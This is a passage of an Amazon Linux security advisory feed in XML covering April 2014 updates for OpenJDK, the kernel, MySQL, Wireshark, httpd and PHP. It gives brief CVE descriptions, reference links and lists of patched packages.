Multiple improper permission check issues were discovered in the AWT, JAX-WS, JAXB, Libraries, Security, Sound, and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-0446:
Multiple improper permission check issues were discovered in the AWT, JAX-WS, JAXB, Libraries, Security, Sound, and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-0429:
An input validation flaw was discovered in the medialib library in the 2D component. A specially crafted image could trigger Java Virtual Machine memory corruption when processed. A remote attacker, or an untrusted Java application or applet, could possibly use this flaw to execute arbitrary code with the privileges of the user running the Java Virtual Machine.
CVE-2013-5797:
It was discovered that the fix for CVE-2013-5797 did not properly resolve input sanitization flaws in javadoc. When javadoc documentation was generated from an untrusted Java source code and hosted on a domain not controlled by the code author, these issues could make it easier to perform cross-site scripting (XSS) attacks.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5797" title="" id="CVE-2013-5797" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0429" title="" id="CVE-2014-0429" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0446" title="" id="CVE-2014-0446" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0451" title="" id="CVE-2014-0451" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0452" title="" id="CVE-2014-0452" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0453" title="" id="CVE-2014-0453" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0454" title="" id="CVE-2014-0454" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0455" title="" id="CVE-2014-0455" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0456" title="" id="CVE-2014-0456" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0457" title="" id="CVE-2014-0457" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0458" title="" id="CVE-2014-0458" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0459" title="" id="CVE-2014-0459" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0460" title="" id="CVE-2014-0460" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0461" title="" id="CVE-2014-0461" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1876" title="" id="CVE-2014-1876" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2397" title="" id="CVE-2014-2397" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2398" title="" id="CVE-2014-2398" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2402" title="" id="CVE-2014-2402" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2403" title="" id="CVE-2014-2403" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2412" title="" id="CVE-2014-2412" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2413" title="" id="CVE-2014-2413" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2414" title="" id="CVE-2014-2414" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2421" title="" id="CVE-2014-2421" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2423" title="" id="CVE-2014-2423" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2427" title="" id="CVE-2014-2427" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:0406.html" title="" id="RHSA-2014:0406" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.55" release="2.4.7.1.40.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.55-2.4.7.1.40.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-javadoc" version="1.7.0.55" release="2.4.7.1.40.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.7.0-openjdk-javadoc-1.7.0.55-2.4.7.1.40.amzn1.noarch.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.55" release="2.4.7.1.40.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-1.7.0.55-2.4.7.1.40.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.55" release="2.4.7.1.40.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.55-2.4.7.1.40.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.55" release="2.4.7.1.40.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.55-2.4.7.1.40.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.55" release="2.4.7.1.40.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.55-2.4.7.1.40.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.55" release="2.4.7.1.40.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.55-2.4.7.1.40.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.55" release="2.4.7.1.40.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.55-2.4.7.1.40.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.55" release="2.4.7.1.40.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-1.7.0.55-2.4.7.1.40.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.55" release="2.4.7.1.40.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.55-2.4.7.1.40.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.55" release="2.4.7.1.40.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.55-2.4.7.1.40.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-328</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-328: medium priority package update for kernel</title><issued date="2014-04-22 10:53:00" /><updated date="2014-09-18 00:24:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-2523:
net/netfilter/nf_conntrack_proto_dccp.c in the Linux kernel through 3.13.6 uses a DCCP header pointer incorrectly, which allows remote attackers to cause a denial of service (system crash) or possibly execute arbitrary code via a DCCP packet that triggers a call to the (1) dccp_new, (2) dccp_packet, or (3) dccp_error function.
1077343:
CVE-2014-2523 kernel: netfilter: nf_conntrack_dccp: incorrect skb_header_pointer API usages
CVE-2014-2309:
The ip6_route_add function in net/ipv6/route.c in the Linux kernel through 3.13.6 does not properly count the addition of routes, which allows remote attackers to cause a denial of service (memory consumption) via a flood of ICMPv6 Router Advertisement packets.
1074471:
CVE-2014-2309 Kernel: net: IPv6: crash due to router advertisement flooding
CVE-2014-0077:
drivers/vhost/net.c in the Linux kernel before 3.13.10, when mergeable buffers are disabled, does not properly validate packet lengths, which allows guest OS users to cause a denial of service (memory corruption and host OS crash) or possibly gain privileges on the host OS via crafted packets, related to the handle_rx and get_rx_bufs functions.
1064440:
CVE-2014-0077 kernel: vhost-net: insufficiency in handling of big packets in handle_rx()
CVE-2014-0055:
The get_rx_bufs function in drivers/vhost/net.c in the vhost-net subsystem in the Linux kernel package before 2.6.32-431.11.2 on Red Hat Enterprise Linux (RHEL) 6 does not properly handle vhost_get_vq_desc errors, which allows guest OS users to cause a denial of service (host OS crash) via unspecified vectors.
1062577:
CVE-2014-0055 kernel: vhost-net: insufficient handling of error conditions in get_rx_bufs()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0055" title="" id="CVE-2014-0055" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0077" title="" id="CVE-2014-0077" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2309" title="" id="CVE-2014-2309" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2523" title="" id="CVE-2014-2523" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perf-debuginfo" version="3.10.37" release="47.135.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-3.10.37-47.135.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="3.10.37" release="47.135.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-3.10.37-47.135.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="3.10.37" release="47.135.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-3.10.37-47.135.amzn1.x86_64.rpm</filename></package><package name="kernel" version="3.10.37" release="47.135.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-3.10.37-47.135.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="3.10.37" release="47.135.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-3.10.37-47.135.amzn1.x86_64.rpm</filename></package><package name="perf" version="3.10.37" release="47.135.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-3.10.37-47.135.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="3.10.37" release="47.135.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-3.10.37-47.135.amzn1.x86_64.rpm</filename></package><package name="kernel" version="3.10.37" release="47.135.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-3.10.37-47.135.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="3.10.37" release="47.135.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-3.10.37-47.135.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="3.10.37" release="47.135.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-3.10.37-47.135.amzn1.i686.rpm</filename></package><package name="perf" version="3.10.37" release="47.135.amzn1" epoch="0" arch="i686"><filename>Packages/perf-3.10.37-47.135.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="3.10.37" release="47.135.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-3.10.37-47.135.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="3.10.37" release="47.135.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-3.10.37-47.135.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="3.10.37" release="47.135.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-3.10.37-47.135.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="3.10.37" release="47.135.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-3.10.37-47.135.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-329</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-329: medium priority package update for mysql55</title><issued date="2014-04-25 15:48:00" /><updated date="2014-09-18 00:31:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-2440:
Unspecified vulnerability in the MySQL Client component in Oracle MySQL 5.5.36 and earlier and 5.6.16 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
1088197:
CVE-2014-2440 mysql: unspecified vulnerability in MySQL Client subcomponent (CPU April 2014)
CVE-2014-2438:
Unspecified vulnerability in Oracle MySQL Server 5.5.35 and earlier and 5.6.15 and earlier allows remote authenticated users to affect availability via unknown vectors related to Replication.
1088191:
CVE-2014-2438 mysql: unspecified vulnerability in MySQL server related to Replication subcomponent (CPU April 2014)
CVE-2014-2436:
Unspecified vulnerability in Oracle MySQL Server 5.5.36 and earlier and 5.6.16 and earlier allows remote authenticated users to affect confidentiality, integrity, and availability via vectors related to RBR.
1088190:
CVE-2014-2436 mysql: unspecified vulnerability in MySQL server related to RBR subcomponent (CPU April 2014)
CVE-2014-2432:
Unspecified vulnerability Oracle the MySQL Server component 5.5.35 and earlier and 5.6.15 and earlier allows remote authenticated users to affect availability via unknown vectors related to Federated.
1088179:
CVE-2014-2432 mysql: unspecified vulnerability in MySQL server related to Federated subcomponent (CPU April 2014)
CVE-2014-2431:
Unspecified vulnerability in Oracle MySQL Server 5.5.36 and earlier and 5.6.16 and earlier allows remote attackers to affect availability via unknown vectors related to Options.
1088146:
CVE-2014-2431 mysql: unspecified vulnerability in MySQL server related to Options subcomponent (CPU April 2014)
CVE-2014-2430:
Unspecified vulnerability in Oracle MySQL Server 5.5.36 and earlier and 5.6.16 and earlier allows remote authenticated users to affect availability via unknown vectors related to Performance Schema.
1088143:
CVE-2014-2430 mysql: unspecified vulnerability in MySQL server related to Performance Schema subcomponent (CPU April 2014)
CVE-2014-2419:
Unspecified vulnerability in Oracle MySQL Server 5.5.35 and earlier and 5.6.15 and earlier allows remote authenticated users to affect availability via unknown vectors related to Partition.
1088134:
CVE-2014-2419 mysql: unspecified vulnerability in MySQL server related to Partition subcomponent
CVE-2014-0384:
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.35 and earlier and 5.6.15 and earlier allows remote authenticated users to affect availability via vectors related to XML.
1088133:
CVE-2014-0384 mysql: unspecified vulnerability in MySQL server related to XML subcomponent (CPU April 2014)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0384" title="" id="CVE-2014-0384" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2419" title="" id="CVE-2014-2419" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2430" title="" id="CVE-2014-2430" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2431" title="" id="CVE-2014-2431" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2432" title="" id="CVE-2014-2432" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2436" title="" id="CVE-2014-2436" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2438" title="" id="CVE-2014-2438" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2440" title="" id="CVE-2014-2440" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql55-test" version="5.5.37" release="1.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-test-5.5.37-1.46.amzn1.x86_64.rpm</filename></package><package name="mysql55-server" version="5.5.37" release="1.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-server-5.5.37-1.46.amzn1.x86_64.rpm</filename></package><package name="mysql55-bench" version="5.5.37" release="1.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-bench-5.5.37-1.46.amzn1.x86_64.rpm</filename></package><package name="mysql55-embedded" version="5.5.37" release="1.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-embedded-5.5.37-1.46.amzn1.x86_64.rpm</filename></package><package name="mysql55-embedded-devel" version="5.5.37" release="1.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-embedded-devel-5.5.37-1.46.amzn1.x86_64.rpm</filename></package><package name="mysql55-libs" version="5.5.37" release="1.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-libs-5.5.37-1.46.amzn1.x86_64.rpm</filename></package><package name="mysql55-devel" version="5.5.37" release="1.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-devel-5.5.37-1.46.amzn1.x86_64.rpm</filename></package><package name="mysql55-debuginfo" version="5.5.37" release="1.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-debuginfo-5.5.37-1.46.amzn1.x86_64.rpm</filename></package><package name="mysql55-common" version="5.5.37" release="1.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-common-5.5.37-1.46.amzn1.x86_64.rpm</filename></package><package name="mysql55" version="5.5.37" release="1.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-5.5.37-1.46.amzn1.x86_64.rpm</filename></package><package name="mysql55-server" version="5.5.37" release="1.46.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-server-5.5.37-1.46.amzn1.i686.rpm</filename></package><package name="mysql55-debuginfo" version="5.5.37" release="1.46.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-debuginfo-5.5.37-1.46.amzn1.i686.rpm</filename></package><package name="mysql55-devel" version="5.5.37" release="1.46.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-devel-5.5.37-1.46.amzn1.i686.rpm</filename></package><package name="mysql55-common" version="5.5.37" release="1.46.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-common-5.5.37-1.46.amzn1.i686.rpm</filename></package><package name="mysql55-test" version="5.5.37" release="1.46.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-test-5.5.37-1.46.amzn1.i686.rpm</filename></package><package name="mysql55-embedded-devel" version="5.5.37" release="1.46.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-embedded-devel-5.5.37-1.46.amzn1.i686.rpm</filename></package><package name="mysql55-libs" version="5.5.37" release="1.46.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-libs-5.5.37-1.46.amzn1.i686.rpm</filename></package><package name="mysql55" version="5.5.37" release="1.46.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-5.5.37-1.46.amzn1.i686.rpm</filename></package><package name="mysql55-bench" version="5.5.37" release="1.46.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-bench-5.5.37-1.46.amzn1.i686.rpm</filename></package><package name="mysql55-embedded" version="5.5.37" release="1.46.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-embedded-5.5.37-1.46.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-330</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-330: medium priority package update for wireshark</title><issued date="2014-04-25 15:57:00" /><updated date="2014-09-18 00:29:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-2299:
Two flaws were found in Wireshark. If Wireshark read a malformed packet off a network or opened a malicious dump file, it could crash or, possibly, execute arbitrary code as the user running Wireshark.
CVE-2014-2283:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2014-2281:
Two flaws were found in Wireshark. If Wireshark read a malformed packet off a network or opened a malicious dump file, it could crash or, possibly, execute arbitrary code as the user running Wireshark.
CVE-2013-7114:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2013-7112:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2013-6340:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2013-6339:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2013-6338:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2013-6337:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2013-6336:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6336" title="" id="CVE-2013-6336" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6337" title="" id="CVE-2013-6337" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6338" title="" id="CVE-2013-6338" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6339" title="" id="CVE-2013-6339" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6340" title="" id="CVE-2013-6340" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7112" title="" id="CVE-2013-7112" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7114" title="" id="CVE-2013-7114" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2281" title="" id="CVE-2014-2281" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2283" title="" id="CVE-2014-2283" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2299" title="" id="CVE-2014-2299" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:0342.html" title="" id="RHSA-2014:0342" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="wireshark" version="1.8.10" release="7.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/wireshark-1.8.10-7.13.amzn1.x86_64.rpm</filename></package><package name="wireshark-devel" version="1.8.10" release="7.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/wireshark-devel-1.8.10-7.13.amzn1.x86_64.rpm</filename></package><package name="wireshark-debuginfo" version="1.8.10" release="7.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/wireshark-debuginfo-1.8.10-7.13.amzn1.x86_64.rpm</filename></package><package name="wireshark" version="1.8.10" release="7.13.amzn1" epoch="0" arch="i686"><filename>Packages/wireshark-1.8.10-7.13.amzn1.i686.rpm</filename></package><package name="wireshark-devel" version="1.8.10" release="7.13.amzn1" epoch="0" arch="i686"><filename>Packages/wireshark-devel-1.8.10-7.13.amzn1.i686.rpm</filename></package><package name="wireshark-debuginfo" version="1.8.10" release="7.13.amzn1" epoch="0" arch="i686"><filename>Packages/wireshark-debuginfo-1.8.10-7.13.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-331</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-331: medium priority package update for httpd</title><issued date="2014-04-25 16:00:00" /><updated date="2014-09-18 00:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0098:
A buffer over-read flaw was found in the httpd mod_log_config module. In configurations where cookie logging is enabled (on Red Hat Enterprise Linux it is disabled by default), a remote attacker could use this flaw to crash the httpd child process via an HTTP request with a malformed cookie header.
CVE-2013-6438:
It was found that the mod_dav module did not correctly strip leading white space from certain elements in a parsed XML. In certain httpd configurations that use the mod_dav module (for example when using the mod_dav_svn module), a remote attacker could send a specially crafted DAV request that would cause the httpd child process to crash or, possibly, allow the attacker to execute arbitrary code with the privileges of the "apache" user.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6438" title="" id="CVE-2013-6438" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0098" title="" id="CVE-2014-0098" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:0370.html" title="" id="RHSA-2014:0370" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="httpd" version="2.2.27" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-2.2.27-1.2.amzn1.x86_64.rpm</filename></package><package name="httpd-manual" version="2.2.27" release="1.2.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd-manual-2.2.27-1.2.amzn1.noarch.rpm</filename></package><package name="httpd-devel" version="2.2.27" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-devel-2.2.27-1.2.amzn1.x86_64.rpm</filename></package><package name="httpd-tools" version="2.2.27" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-tools-2.2.27-1.2.amzn1.x86_64.rpm</filename></package><package name="mod_ssl" version="2.2.27" release="1.2.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod_ssl-2.2.27-1.2.amzn1.x86_64.rpm</filename></package><package name="httpd-debuginfo" version="2.2.27" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-debuginfo-2.2.27-1.2.amzn1.x86_64.rpm</filename></package><package name="httpd-tools" version="2.2.27" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-tools-2.2.27-1.2.amzn1.i686.rpm</filename></package><package name="httpd-devel" version="2.2.27" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-devel-2.2.27-1.2.amzn1.i686.rpm</filename></package><package name="mod_ssl" version="2.2.27" release="1.2.amzn1" epoch="1" arch="i686"><filename>Packages/mod_ssl-2.2.27-1.2.amzn1.i686.rpm</filename></package><package name="httpd-debuginfo" version="2.2.27" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-debuginfo-2.2.27-1.2.amzn1.i686.rpm</filename></package><package name="httpd" version="2.2.27" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-2.2.27-1.2.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-332</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-332: medium priority package update for php55</title><issued date="2014-04-25 16:01:00" /><updated date="2014-09-18 00:31:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-7345:
The BEGIN regular expression in the awk script detector in magic/Magdir/commands in file before 5.15 uses multiple wildcards with unlimited repetitions, which allows context-dependent attackers to cause a denial of service (CPU consumption) via a crafted ASCII file that triggers a large amount of backtracking, as demonstrated via a file with many newline characters.
1079846:
CVE-2013-7345 file: extensive backtracking in awk rule regular expression
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7345" title="" id="CVE-2013-7345" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php55-mbstring" version="5.5.11" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mbstring-5.5.11-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-dba" version="5.5.11" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-dba-5.5.11-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-opcache" version="5.5.11" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-opcache-5.5.11-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-intl" version="5.5.11" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-intl-5.5.11-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-process" version="5.5.11" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-process-5.5.11-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-cli" version="5.5.11" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-cli-5.5.11-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-odbc" version="5.5.11" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-odbc-5.5.11-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-mysqlnd" version="5.5.11" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mysqlnd-5.5.11-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-imap" version="5.5.11" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-imap-5.5.11-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-gd" version="5.5.11" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gd-5.5.11-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-fpm" version="5.5.11" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-fpm-5.5.11-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-xml" version="5.5.11" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xml-5.5.11-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-embedded" version="5.5.11" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-embedded-5.5.11-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-mcrypt" version="5.5.11" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mcrypt-5.5.11-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-mssql" version="5.5.11" 